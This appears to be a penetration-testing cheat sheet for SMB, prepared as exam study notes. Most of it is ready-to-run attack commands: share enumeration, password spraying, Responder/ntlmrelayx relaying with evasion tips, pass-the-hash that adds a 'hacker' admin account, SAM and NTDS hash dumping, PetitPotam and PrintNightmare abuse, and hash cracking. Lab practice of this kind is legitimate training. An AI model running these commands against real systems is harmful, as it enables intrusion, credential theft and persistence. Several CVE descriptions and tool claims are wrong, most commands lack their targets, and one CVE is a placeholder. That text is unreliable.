# SMB ### **SMB Basics** * Function: Protocol for sharing files, printers, serial ports, and other resources across networks. Operates in a client-server model; supports opportunistic locking for performance. * Ports: * TCP/139, UDP/137-138 (NetBIOS over TCP/IP for legacy name resolution and browsing). * TCP/445 (Direct SMB over TCP/IP; modern/default). * Samba: Open-source Unix/Linux/Windows implementation of SMB/CIFS. Config file: /etc/samba/smb.conf. * MSRPC: (DCE/RPC over SMB) Enables remote procedure calls for services like WMI, WinRM. Often tunnels through SMB (port 445). * Key Protocols: NetBIOS (legacy naming), DCE/RPC (remote calls). ### **Enumeration** Start passive (no creds) to map the attack surface, then active. Goal: Identify shares, users, versions, and perms without alerting. * Nmap: ```bash sudo nmap -sV -sC --script=smb* -p 137,139,445 -oA smb_enum ``` * **Info Gained**: SMB version, hostname, OS fingerprint, null session support (via smb-security-mode), shares (via smb-enum-shares), users/groups (via smb-enum-users). * **Output Example**: 445/tcp open microsoft-ds? | smb-os-discovery: OS: Windows 10.0 Build 19041 (name:WIN-ABC); | smb2-security-mode: ... signing:enabled * **Practice**: Run on your lab VM; verify script output in smb\_enum.gnmap. **Advanced Enumeration** * **Enum4linux-ng (Modern Replacement for Enum4linux):** ```bash enum4linux-ng -A -o enum_output.json ``` * **Why Better:** Faster, JSON output for scripting, handles SMBv3 better. Includes RID cycling for user enum. * **Info**: Shares, policies, users, groups, sessions. * **SMBMap (Permissions-Focused):** ```bash smbmap -H -u '' -p '' # Anonymous smbmap -H -u -p # Authenticated ``` * Output: Share paths, read/write perms (e.g., \[C$] Disk Auto READ ONLY Domain Admins). * **Impacket Enum Tools:** {% code overflow="wrap" %} ```bash python3 /opt/impacket/examples/lookupsid.py -hashes : DOMAIN/@ # SID enumeration ``` {% endcode %} * RPC-Focused (for MSRPC): ```bash rpcclient -U '' -N -c "enumdomusers" # Null session users rpcclient -U % -c "srvinfo" # Server info ``` * Tip: Chain tools (Nmap → Enum4linux-ng → SMBMap). Pitfall: Firewalls block UDP/137—fall back to TCP/445. Practice parsing JSON outputs for reports. *** ### **Misconfigurations** Focus on weak auth, over-permissive shares. Test anonymously first. * **Null Sessions (No Authentication Required):** ```bash smbclient -N -L /// # List shares smbclient -N ///IPC$ # Connect to IPC$ for enum smbmap -H # Permissions ``` * **Guest/Anonymous Access:** ```bash crackmapexec smb -u 'guest' -p '' --shares # Enumerate shares as guest ``` * **Weak Share Permissions:** Use smbclient to attempt reads/writes on shares like `C$, ADMIN$`. * **Downgrade Attacks:** Force SMBv1 via tools like smbclient -m SMB1 //\. Detect with Nmap's smb-protocols script. * **Registry Misconfigs:** Post-access, dump via reg save HKLM\SAM sam.hive (if admin share access). * **Tip**: Document perms in a table (Share | Perms | Risk). Pitfall: Modern Windows blocks null sessions by default—check RestrictAnonymous=2 in the registry. *** ### **Protocol-Specific Attacks** Prioritise low-hanging fruit: Brute force → Relay → Vuln exploits. * Brute-Forcing/Password Spraying: {% code overflow="wrap" %} ```bash crackmapexec smb /24 -u users.txt -p passwords.txt --continue-on-success # Spray across subnet hydra -L users.txt -P pass.txt smb ``` {% endcode %} * **Why CME?** Detects AS-REP roasting, Kerberoasting implicitly. * * Metasploit SMB Login: ```bash msfconsole -q use auxiliary/scanner/smb/smb_login set RHOSTS set USER_FILE users.txt set PASS_FILE pass.txt set STOP_ON_SUCCESS true set VERBOSE true run ``` * Practice: Save successes to loot; use for follow-on attacks. **Relay Attacks (NTLM Relay)** * Setup with Responder + ntlmrelayx: ```bash # Terminal 1: Poison LLMNR/NBT-NS/MDNS responder -I eth0 -wrd # -w: WPAD, -r: NBT-NS, -d: MDNS # Terminal 2: Relay to SMB python3 /opt/impacket/examples/ntlmrelayx.py -t smb:// --smb2support ``` * **Outcome**: Captures NTLM hashes; relays for RCE (e.g., DCSync if domain controller). * **Evasion**: Add --no-http to avoid detection; use -6 for IPv6 poisoning. * **Multi-Relay (Impacket):** {% code overflow="wrap" %} ```bash ntlmrelayx.py -tf targets.txt -smb2support --delegate-access # Delegate for persistence ``` {% endcode %} * **Tip**: Understand the LLMNR poisoning chain. Pitfall: SMB signing blocks relays—check with crackmapexec smb target --shares -u '' -p '' | grep signing. *** ### **Windows Attacks** Leverage creds/hashes for lateral movement/escalation. * **Remote Code Execution (RCE):** {% code overflow="wrap" %} ```bash # Impacket psexec (WMI alternative to SMBExec) psexec.py /:@ cmd.exe # CME smbexec (stealthier, no shell) crackmapexec smb -u -p -x "powershell.exe -c whoami" --exec-method smbexec ``` {% endcode %} * **Enumerate Logged-on Users:** {% code overflow="wrap" %} ```bash crackmapexec smb -u -p --loggedon-users --sessions # Also shows sessions ``` {% endcode %} * **Extract Hashes from SAM:** ```bash crackmapexec smb -u -p --sam # Dumps local SAM secretsdump.py /:@ # Full NTDS.dit if DC ``` * **Pass-the-Hash (PtH):** {% code overflow="wrap" %} ```bash crackmapexec smb -u -H -x "net user hacker P@ssw0rd /add" # Add user wmiexec.py -hashes @ "whoami /priv" # WMI for stealth ``` {% endcode %} ### **Privilege Escalation via SMB** * **Unquoted Service Paths (via SMB Shares):** 1. Enum services: crackmapexec smb target -u user -p pass --services. 2. If vulnerable (e.g., path C:\Program Files\Service.exe), upload the payload to share and trigger. * **DLL Hijacking over SMB:** Host malicious DLL on attacker-controlled share; coerce via PrintNightmare (CVE-2021-34527) or PetitPotam. ```bash # Coerce auth with PetitPotam python3 petitpotam.py # Forces auth to your Responder ``` * **Tip**: Chain PtH → Escalation. Pitfall: UAC blocks; use --local-auth in CME. *** **Forced Authentication Attacks (Responder)** * Core Setup: ```bash responder -I -v -A # -A: Analyze mode for non-poisoning # Capture: Watch for `Sending NTLMv2 challenge` ``` * **WPAD Poisoning Integration:** ```bash # In smb.conf: [WPAD] path=/wpad.dat; read list = yes # Then: responder -I eth0 -wP # Proxy Auto-Discovery ``` * **Detection Evasion:** Run on non-standard ports; monitor with Wireshark for NTLMSSP\_AUTH. *** **Hash Cracking** * NTLMv2 (Mode 5600): ```bash hashcat -m 5600 ntlm_hashes.txt rockyou.txt -w 3 -O # GPU-optimized john --format=netntlmv2 hashes.txt --wordlist=rockyou.txt # CPU alternative ``` * **Hybrid Attacks:** hashcat -m 5600 hashes.txt rockyou.txt ?d?d?d?d (append 4 digits). * **Practice**: Use captured hashes from Responder; aim for <5min cracks on weak pass (e.g., "Password123"). *** ### **Latest SMB Vulnerabilities** Your SMBGhost (CVE-2020-0796) is solid but dated. Updated with recent CVEs (post-2023). Focus on zero-days and patches. * **SMBGhost (CVE-2020-0796):** As original. Exploit: msfconsole > use exploit/windows/smb/cve\_2020\_0796\_smbghost. Affected: Win10 1903/1909. Patch: KB4551762. * **PrintNightmare (CVE-2021-34527, SMB-Related via Spooler):** RCE via SMB spooler shares. Exploit: ```bash python3 spooler.py /:@ /path/to/malicious.dll ``` * Impact: Local priv esc to SYSTEM. * **CVE-2023-23397 (Net-NTLM3 Bypass):** Allows relay despite signing. Tool: Custom Impacket patch. * **CVE-2024-38063 (SMB Client RCE):** Denial-of-service leading to info leak in Win11. Exploit PoC: GitHub (search "CVE-2024-38063"). Affected: Win10/11 pre-July 2024 patch. * **Emerging (2025):** Watch CVE-2025-XXXX (hypothetical SMB multichannel flaw; check MSRC monthly). Use searchsploit smb for PoCs. * **Tip**: Know detection (e.g., YARA rules for EternalBlue). Pitfall: Exploits fail on patched systems—always version-check first. Practice: Metasploit modules for EternalBlue (MS17-010) as a classic. #### **Practice Checklist** * Lab Setup: Vuln Win VM + Kali. * Enumerate 3 targets; document findings. * Successful relay/PtH on 1 target. * Crack 5 hashes; report weak policies. * Simulate exam: 30min SMB-only pentest.